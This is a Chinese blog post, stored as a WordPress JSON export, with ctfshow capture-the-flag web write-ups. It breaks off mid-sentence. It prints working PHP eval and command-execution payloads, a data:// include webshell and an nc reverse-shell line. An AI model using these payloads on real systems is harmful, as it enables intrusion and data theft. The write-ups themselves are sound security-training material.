{"id":733,"date":"2023-08-20T11:35:31","date_gmt":"2023-08-20T03:35:31","guid":{"rendered":"https:\/\/fushuling.com\/?p=733"},"modified":"2024-01-17T02:45:45","modified_gmt":"2024-01-16T18:45:45","slug":"ctfshow%e5%88%b7%e9%a2%98%e8%ae%b0%e5%bd%95%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%e4%b8%ad","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/08\/20\/ctfshow%e5%88%b7%e9%a2%98%e8%ae%b0%e5%bd%95%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%e4%b8%ad\/","title":{"rendered":"ctfshow\u5237\u9898\u8bb0\u5f55(\u6301\u7eed\u66f4\u65b0\u4e2d)"},"content":{"rendered":"\n

\u4ec5\u4f9b\u4e2a\u4eba\u77e5\u8bc6\u70b9\u8bb0\u5f55<\/p>\n\n\n\n

Web<\/h1>\n\n\n\n

\u8d5b\u4e8b\u9898<\/h1>\n\n\n\n

\u5403\u74dc\u676f<\/h2>\n\n\n\n

\u70ed\u8eab<\/h3>\n\n\n\n
<?php\ninclude(\"flag.php\");\nhighlight_file(__FILE__);\nif(isset($_GET['num'])){\n    $num = $_GET['num'];\n    if($num==4476){\n        die(\"no no no!\");\n    }\n    if(preg_match(\"\/[a-z]|\\.\/i\", $num)){\n        die(\"no no no!!\");\n    }\n    if(!strpos($num, \"0\")){\n        die(\"no no no!!!\");\n    }\n    if(intval($num,0)===4476){\n        echo $flag;\n    }\n}<\/code><\/pre>\n\n\n\n
\u7b2c\u4e00\u4e2a\u5c31\u662f\u4e2a\u5f31\u6bd4\u8f83\uff0c\u6211\u4eec\u6ce8\u610f\u5230\u6700\u540e\u7684\u4ee3\u7801\u6bd4\u8f83\u7684\u5176\u5b9e\u662fintval($num,0)\u662f\u5426\u7b49\u4e8e4476\uff0c\u4e5f\u5c31$num\u8f6c\u5316\u4e3a\u6574\u6570\u540e\u7684\u503c\uff0c\u6240\u4ee5\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u516b\u8fdb\u5236\u76844476\u4e5f\u5c31\u662f010574\uff0c\u8fd9\u6837\u5c31\u628a\u7b2c\u4e00\u4e2a\u5f31\u6bd4\u8f83\u5224\u65ad\u4ee5\u53ca\u7b2c\u4e8c\u4e2a\u786e\u4fdd\u6ca1\u5b57\u6bcd\u7ed5\u8fc7\u53bb\u4e86\uff0c\u7b2c\u4e09\u4e2a\u5224\u65ad\u7684\u610f\u601d\u5176\u5b9e\u662f\u4fdd\u8bc1strpos($num, “0”)\u4e0d\u7b49\u4e8e\u96f6\uff0c\u5982\u679c\u7b49\u4e8e\u96f6\u95ee\u53f7\u53d6\u53cd\u540e\u53d8\u62101\u5c31\u8fdb\u5165\u5206\u652fdie()\u4e86\u3002strpos($num, “0”)\u7684\u610f\u601d\u662f\u5bfb\u627e$num\u7b2c\u4e00\u6b21\u51fa\u73b0\u96f6\u7684\u4f4d\u7f6e\uff0c\u6240\u4ee5\u53ea\u89810\u4e0d\u5728\u7b2c\u4e00\u4e2a\u51fa\u73b0\u5c31\u4e0d\u4e3a0\u4e86\uff0c\u8fd9\u91cc\u6211\u4f7f\u7528\u4e86\u6b63\u53f7\uff0c\u5176\u5b9e\u52a0\u7a7a\u683c\u4e5f\u80fd\u7ed5\u8fc7\uff0c\u589e\u52a0\u65e0\u7528\u5b57\u7b26\u5c060\u653e\u5728\u7b2c\u4e00\u4f4d\u4e4b\u540e\u5373\u53ef<\/p>\n\n\n\n
?num=+010574<\/code><\/pre>\n\n\n\n
shellme<\/h3>\n\n\n\n
ctrl f\u641c\u7d22flag\u5c31\u627e\u5230\u4e86<\/p>\n\n\n\n
shellme_Revenge<\/h3>\n\n\n\n
\u4e00\u5165\u773c\u4e00\u5927\u5806disable_function\uff0ccookie\u63d0\u793a\u6211\u4eec\u7528?looklook\u4f20\u503c\uff0c\u8f93\u5165?looklook=1\u770b\u5230\u6e90\u7801\uff1a<\/p>\n\n\n\n
 <?php\nerror_reporting(0);\nif ($_GET['looklook']){\n    highlight_file(__FILE__);\n}else{\n    setcookie(\"hint\", \"?looklook\", time()+3600);\n}\nif (isset($_POST['ctf_show'])) {\n    $ctfshow = $_POST['ctf_show'];\n    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {\n        if (!preg_match(\"\/[!@#%^&*:'\\\"|`a-zA-BD-Z~\\\\\\\\]|[4-9]\/\",$ctfshow)){\n            eval($ctfshow);\n        }else{\n            echo(\"fucccc hacker!!\");\n        }\n    }\n} else {\n\n    phpinfo();\n}\n?> <\/code><\/pre>\n\n\n\n
\u5148\u8dd1\u4e00\u624b\u6b63\u5219\uff1a<\/p>\n\n\n\n
<?php\n\nfor($a = 0; $a < 256; $a++){\n\n    if (!preg_match(\"\/[!@#%^&*:'\\\"|`a-zA-BD-Z~\\\\\\\\]|[4-9]\/\",chr($a))){\n\n        echo chr($a).\" \";\n\n    }\n\n}\n\n?><\/code><\/pre>\n\n\n\n
 $ ( ) + , - . \/ 0 1 2 3 ; < = > ? C [ ] _ { } <\/code><\/pre>\n\n\n\n
\u7ecf\u5178\u7684\u65e0\u5b57\u6bcdwebshell\uff0c\u6709\u4e86+\u5e94\u8be5\u662f\u7528\u81ea\u589e\u6784\u9020\uff0c\u7528RCE\u6311\u62185\u91cc\u90a3\u4e2a\u901a\u7528\u89e3\u5c31\u884c\u4e86\uff0c\u8fd9\u91ccsystem\u5565\u7684\u90fdban\u4e86\uff0c\u6362\u6210passthru\u6267\u884c\u547d\u4ee4\uff1a(\u8bb0\u5f97burpsuite\u4f20\u522b\u7528hackbar)<\/p>\n\n\n\n
ctf_show=$_=(_\/_._)[_];$_%2b%2b;$%FA=$_.$_%2b%2b;$_%2b%2b;$_%2b%2b;$_=_.$%FA.%2b%2b$_.%2b%2b$_;$$_[_]($$_[%FA]);&_=passthru&%FA=cat \/f*<\/code><\/pre>\n\n\n\n
\u65b0\u624b\u676f<\/h2>\n\n\n\n
easy_eval<\/h3>\n\n\n\n
<?php\n\n\n\nerror_reporting(0);\nhighlight_file(__FILE__);\n\n$code = $_POST['code'];\n\nif(isset($code)){\n\n  $code = str_replace(\"?\",\"\",$code);\n  eval(\"?>\".$code);\n\n}<\/code><\/pre>\n\n\n\n
\u8fc7\u6ee4\u4e86?\uff0c\u8003\u8651php\u7684\u6807\u8bb0\u98ce\u683c\uff1a<\/p>\n\n\n\n
<?php ...?>\n<?...?>\n<%...%>\n<script language=\"php\">...<\/script><\/code><\/pre>\n\n\n\n
payload:<\/p>\n\n\n\n
POST:code=<script language=\"php\">system(\"cat \/f*\");<\/script><\/code><\/pre>\n\n\n\n
\u4e03\u5915\u676f<\/h2>\n\n\n\n
web\u7b7e\u5230<\/h3>\n\n\n\n
\u4efb\u610f\u547d\u4ee4\u6267\u884c\uff0c\u4f46\u6ca1\u6709\u56de\u663e\uff0c\u5b57\u7b26\u6570\u4e0d\u8d85\u8fc77\u3002hitcon\u90a3\u4e2a\u9898\u7684\u7a76\u6781\u7b80\u5316\u7248\uff0c\u4e00\u53e5\u8bdd\u5c31\u641e\u5b9a\u4e86\uff1a<\/p>\n\n\n\n
nl \/*>a  <\/code><\/pre>\n\n\n\n
\u867d\u7136\u4e4b\u524dhitcon\u7684\u9898\u5df2\u7ecf\u89e3\u91ca\u8fc7\u4e86\uff0c\u8fd9\u91cc\u518d\u7b80\u5355\u89e3\u91ca\u4e00\u4e0b\uff0cnl\u662f\u4e00\u4e2alinux\u91cc\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\u7684\u547d\u4ee4\uff0c\/*\u5c31\u662f\u6839\u76ee\u5f55\u4e0b\u7684\u6240\u6709\u6587\u4ef6\uff0c>+fileanme\u6765\u5b9e\u73b0\u65b0\u5efa\u4e00\u4e2a\u6587\u4ef6(>\u662f\u8986\u76d6\uff0c>>\u662f\u8ffd\u52a0)\uff0c\u6240\u4ee5\u6211\u8fd9\u884c\u547d\u4ee4\u610f\u601d\u5c31\u662f\u8bfb\u53d6\u6839\u76ee\u5f55\u4e0b\u6240\u6709\u6587\u4ef6\u5e76\u5bfc\u5165\u6587\u4ef6a\u79cd\uff0c\u7136\u540e\u8bbf\u95ee6574a4b0-8acb-4f2d-a23c-45bc408ed17a.challenge.ctf.show\/api\/a\u5373\u53ef\u62ff\u5230flag<\/p>\n\n\n\n
easy_calc<\/h3>\n\n\n\n
<?php\n\n\nif(check($code)){\n\n    eval('$result='.\"$code\".\";\");\n    echo($result);    \n}\n\nfunction check(&$code){\n\n    $num1=$_POST['num1'];\n    $symbol=$_POST['symbol'];\n    $num2=$_POST['num2'];\n\n    if(!isset($num1) || !isset($num2) || !isset($symbol) ){\n        \n        return false;\n    }\n\n    if(preg_match(\"\/!|@|#|\\\\$|\\%|\\^|\\&|\\(|_|=|{|'|<|>|\\?|\\?|\\||`|~|\\[\/\", $num1.$num2.$symbol)){\n        return false;\n    }\n\n    if(preg_match(\"\/^[\\+\\-\\*\\\/]$\/\", $symbol)){\n        $code = \"$num1$symbol$num2\";\n        return true;\n    }\n\n    return false;\n}<\/code><\/pre>\n\n\n\n
\u5173\u952e\u70b9\u6beb\u65e0\u7591\u95ee\u662f\u8fd9\u4e2aeval()\uff0c\u4f46\u662f\u6709\u4e2acheck\u51fd\u6570\u8fdb\u884c\u4e86\u5224\u65ad\u3002\u6211\u4eec\u7b80\u5355\u5206\u6790\u4e0b\uff0c\u9996\u5148$num1.$num2.$symbol\u4e5f\u5c31\u662f\u4f20\u8fdb\u6765\u7684\u4e09\u4e2a\u503c\u62fc\u63a5\u8d77\u6765\u53ef\u7528\u5b57\u7b26\u53ea\u6709<\/p>\n\n\n\n
\" ) * + , - . \/ : ; \\ ] } 0~9 a~z A~Z<\/code><\/pre>\n\n\n\n
\u5176\u6b21\u662f\u7b2c\u4e8c\u4e2apregmatch\uff0c\u9650\u5236\u4e86symbol\u91cc\u5fc5\u987b\u6709<\/p>\n\n\n\n
* + - \/ <\/code><\/pre>\n\n\n\n
\u6709eval\u6267\u884c\u4ee3\u7801\uff0c\u4f46\u662f\u4e0d\u80fd\u6709(\u6216\u8005{\uff0c\u6267\u884c\u51fd\u6570\u662f\u4e0d\u884c\u4e86\uff0c\u5f97\u627e\u4e00\u4e2a\u4e0d\u7528\u62ec\u53f7\u7684\u51fd\u6570\uff0c\u6bd4\u5982include\uff0c\u6b63\u5e38\u7684\u5305\u542b\u662f\uff1a<\/p>\n\n\n\n
include \"data:\/\/text\/plain,<?php phpinfo();?>\"<\/code><\/pre>\n\n\n\n
\u4f46\u6211\u4eec\u8fd9\u91cc\u4e0d\u80fd\u7528\u62ec\u53f7\u6216\u8005<\uff0c\u6211\u4eec\u53ef\u4ee5\u5148\u8fdb\u884c\u4e00\u6b21\u7f16\u7801\uff1a<\/p>\n\n\n\n
include \"data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8+\"<\/code><\/pre>\n\n\n\n
\u56e0\u4e3a\u5f97\u6ee1\u8db3\u4e0a\u9762\u5206\u6210\u4e09\u6bb5\u7684\u8981\u6c42\uff0c\u6211\u4eec\u6362\u4e00\u79cd\u5199\u6cd5\u518d\u62c6\u5206\u4e00\u4e0b\uff1a<\/p>\n\n\n\n
num1=include \"data:ctfshow\nsymbol=\/\nnum2=b;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4\";\n$num1$symbol$num2=include \"data:ctfshow\/b;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4\";<\/code><\/pre>\n\n\n\n
payload\uff1a<\/p>\n\n\n\n
GET:?1=system('cat \/secret');die();\nPOST\uff1anum1=include \"data:ctfshow&symbol=\/&num2=b;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4\";<\/code><\/pre>\n\n\n\n
\u6ce8\uff1a\u4e4b\u524d\u786e\u5b9e\u6ca1\u60f3\u5230\u8fd9\u6837\u4e5f\u80fd\u5305\u542b<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
easy_cmd<\/h3>\n\n\n\n
<?php\n\nerror_reporting(0);\nhighlight_file(__FILE__);\n\n$cmd=$_POST['cmd'];\n\nif(preg_match(\"\/^\\b(ping|ls|nc|ifconfig)\\b\/\",$cmd)){\n        exec(escapeshellcmd($cmd));\n}\n?>\n<\/code><\/pre>\n\n\n\n
nc\u5f39shell\u5373\u53ef<\/p>\n\n\n\n
POST cmd=nc ip port -e \/bin\/sh<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
easy_sql<\/h3>\n\n\n\n
\u8ddf\u7740\u5927\u4f6c\u601d\u8def\u8d70\u4e00\u4e0b\uff1a<\/p>\n\n\n\n
\u67e5\u8be2\u53e3\u7684\u4ee3\u7801\uff1a<\/p>\n\n\n\n
public String auth(@RequestParam String username, @RequestParam String password, HttpServletRequest request){\n    String message=\"\u793e\u5de5\u5e93\u672a\u67e5\u8be2\u5230\u6cc4\u9732\u8bb0\u5f55\uff0c\u4f60\u7684\u8d26\u53f7\u662f\u5b89\u5168\u7684\u3002\";\n\n    if(SafeUtil.sql_check(username) || SafeUtil.sql_check(password)){\n        message=\"stop sql inject!\";\n        return message;\n    }\n\n    try {\n        String sql = \"select username,password from app_user where username ='\" + username + \"' and password ='\" + password + \"' ;\";\n        ResultSet resultSet = DbUtil.getInstance().query(sql);\n        if (null != resultSet) {\n            while (resultSet.next()) {\n                message = \"\u60a8\u7684QQ\u8d26\u53f7\u5bc6\u7801\u5df2\u7ecf\u6cc4\u9732\uff0c\u8bf7\u7acb\u5373\u4fee\u6539\u5bc6\u7801\";\n                break;\n            }\n        }\n    }catch (Exception e){\n        e.printStackTrace();\n        message=\"\u6570\u636e\u67e5\u8be2\u51fa\u9519\";\n    }\n    insertQueryLog(username,password);\n    return message;\n}<\/code><\/pre>\n\n\n\n
\u5f88\u660e\u663e\u6709\u4e00\u4e2asql\u8bed\u53e5\uff0c\u53ef\u80fd\u6709sql\u6ce8\u5165\uff0c\u4f46\u8fd9\u91cc\u6709\u4e2aSafeUtil.sql_check\uff0c\u5148\u770b\u770b\u8fc7\u6ee4:<\/p>\n\n\n\n
public static boolean sql_check(String sql){\n\n    sql = sql.toLowerCase(Locale.ROOT);\n    String ban[] = {\"'\",\n            \"file\",\n            \"information\",\n            \"mysql\",\n            \"from\",\n            \"update\",\n            \"delete\",\n            \"select\",\",\",\"union\",\"sleep\",\"(\"};\n    for (String s:ban) {\n        if(sql.contains(s)){\n            return true;\n        }\n    }\n    return false;\n}<\/code><\/pre>\n\n\n\n
\u8fc7\u6ee4\u4e86\u5355\u5f15\u53f7\uff0c\u4f46\u662f\u53ef\u4ee5\u8f6c\u4e49\u7ed5\u8fc7\uff0c\u6211\u4eec\u518d\u6765\u770b\u770b\u914d\u7f6e\u6587\u4ef6config.properties\uff1a<\/p>\n\n\n\n
url=jdbc:mysql:\/\/127.0.0.1:3306\/app?characterEncoding=utf-8&useSSL=false&&autoReconnect=true&allowMultiQueries=true&serverTimezone=UTC\ndb_username=root\ndb_password=root<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u6709\u4e00\u53e5allowMultiQueries=true\uff0c\u800c\u4e14\u6ca1\u8fc7\u7387\u5206\u53f7\uff0c\u6240\u4ee5\u5f88\u660e\u663e\u53ef\u4ee5\u5806\u53e0\u6ce8\u5165\u4e86\uff0c\u518d\u770b\u770b\u8fd9\u4e2ainsertQueryLog(username,password)<\/p>\n\n\n\n
private int insertQueryLog(String username,String password){\n    String sql = \"insert into app_query_log(username,password) values(?,?);\";\n    Connection connection = DbUtil.getConnection();\n    PreparedStatement preparedStatement;\n    int count=0;\n    try {\n        connection.setAutoCommit(false);\n        preparedStatement=connection.prepareStatement(sql);\n        preparedStatement.setQueryTimeout(3);\n        preparedStatement.setString(1,username);\n        preparedStatement.setString(2,password);\n        count = preparedStatement.executeUpdate();\n        connection.commit();\n    } catch (SQLException e) {\n        LogUtil.save(username,password);\n        e.printStackTrace();\n    }\n\n    return count;\n}<\/code><\/pre>\n\n\n\n
\u6709\u4e00\u53e5LogUtil.save()\uff0c\u7ee7\u7eed\u8ddf\u8fdb\u770b\u770b\uff1a<\/p>\n\n\n\n
public class LogUtil {\n    public LogUtil() {\n    }\n\n    public static void save(String username, String password) {\n        FileUtil.SaveFileAs(username, password);\n    }\n}<\/code><\/pre>\n\n\n\n
\u7ee7\u7eed\u8ddf\u8fdb\uff1a<\/p>\n\n\n\n
public static boolean SaveFileAs(String content, String path) {\n    FileWriter fw = null;\n\n    boolean var4;\n    try {\n        fw = new FileWriter(new File(path), false);\n        if (content != null) {\n            fw.write(content);\n        }\n\n        return true;\n    } catch (IOException var14) {\n        var14.printStackTrace();\n        var4 = false;\n    } finally {\n        if (fw != null) {\n            try {\n                fw.flush();\n                fw.close();\n            } catch (IOException var13) {\n                var13.printStackTrace();\n            }\n        }\n\n    }\n\n    return var4;\n}<\/code><\/pre>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\u8fd9\u91cc\u5176\u5b9e\u6709\u4e00\u4e2a\u4fdd\u5b58\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u5982\u679c\u6211\u4eec\u8ba9\u4e0a\u9762\u7684insertQueryLog()\u62a5\u9519\uff0c\u5c31\u4f1a\u8fdb\u5165catch (SQLException e) \uff0c\u7136\u540e\u901a\u8fc7LogUtil.save()\u4fdd\u5b58\u6587\u4ef6\uff0c\u5e76\u4e14username<\/strong>\u4e3a\u5185\u5bb9\uff0cpassword<\/strong>\u4e3a\u6587\u4ef6\u540d\uff0c\u4f46\u8fd9\u91cc\u8fc7\u6ee4\u4e86(<\/code>\uff0c\u6211\u4eec\u5fc5\u987b\u65e2\u505a\u5230\u4e0d\u7528\u62ec\u53f7sql\u6ce8\u5165\uff0c\u8fd8\u5f97\u8ba9sql\u8bed\u53e5\u62a5\u9519\uff0c\u56de\u5230\u90a3\u53e5sql\u8bed\u53e5\uff1a<\/p>\n\n\n\n
String sql = \"insert into app_query_log(username,password) values(?,?);\";<\/code><\/pre>\n\n\n\n
\u4e09\u4e2a\u62a5\u9519\u65b9\u6cd5\uff1a<\/p>\n\n\n\n